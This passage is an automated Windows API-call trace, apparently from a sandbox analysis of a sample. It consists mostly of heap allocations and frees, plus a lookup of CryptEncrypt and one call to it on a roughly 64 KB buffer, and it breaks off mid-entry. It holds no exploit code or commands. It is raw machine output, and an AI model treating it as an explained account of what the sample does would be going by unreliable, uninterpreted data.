(HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0138.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0138.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0138.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0138.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0138.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0138.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0139.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0139.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0139.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xffed) returned 0x2ea0320 [0139.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0139.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xffed) returned 0x2eb0318 [0139.004] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0139.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0139.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0139.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0139.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0139.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0139.004] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0139.004] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0139.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0139.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0139.007] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0139.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0139.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0139.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0139.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0139.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0139.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0139.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0139.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0139.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0139.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0139.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0139.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0139.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0139.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0139.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0139.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0139.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0139.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0139.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0139.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0139.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0139.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0139.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0139.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0139.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0139.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0139.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0139.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0139.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0139.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0139.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0139.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0139.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0139.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0139.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0139.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0139.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0139.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0139.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0139.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0139.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0139.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0139.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0139.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0139.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0139.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0139.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0139.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0139.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0139.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0139.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0139.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0139.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0139.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0139.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0139.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0139.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0139.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0139.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0139.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0139.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0139.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0139.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0139.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0139.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0139.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0139.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0139.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0139.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0139.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0139.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0139.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0139.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0139.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0139.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0139.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0139.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0139.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50ba8 [0139.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50ba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0139.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0139.010] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0139.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0139.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0139.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54508 [0139.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0139.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0139.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0139.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0139.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0139.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0139.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0139.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0139.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0139.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0139.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0139.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0139.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0139.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0139.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0139.011] CryptEncrypt (in: hKey=0xa87610, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e90328*, pdwDataLen=0x8cef60*=0xffed, dwBufLen=0xfff0 | out: pbData=0x2e90328*, pdwDataLen=0x8cef60*=0xfff0) returned 1 [0139.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0139.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0139.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0139.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0139.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0139.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0139.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0139.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0139.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0139.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0139.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0139.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0139.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0139.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0139.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0139.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0139.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0139.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0139.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0139.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0139.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0139.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0139.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0139.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0139.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0139.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0139.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0139.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0139.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0139.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0139.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0139.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0139.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0139.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0139.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0139.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0139.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0139.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0139.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0139.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0139.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0139.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0139.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0139.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0139.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0139.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0139.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0139.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0139.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0139.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0139.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0139.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0139.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0139.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0139.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0139.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0139.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0139.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0139.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0139.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0139.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0139.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0139.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0139.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0139.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0139.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0139.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0139.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0139.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0139.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0139.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0139.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0139.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0139.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0139.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0139.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0139.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0139.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0139.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0139.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0139.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0139.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0139.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0139.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0139.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0139.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0139.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0139.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0139.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0139.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0139.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0139.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0139.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0139.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0139.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0139.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0139.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0139.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0139.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0139.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0139.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0139.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0139.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0139.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0139.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0139.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0139.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0139.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0139.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0139.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0139.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0139.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0139.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0139.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0139.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0139.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0139.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0139.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0139.018] PeekMessageW (in: 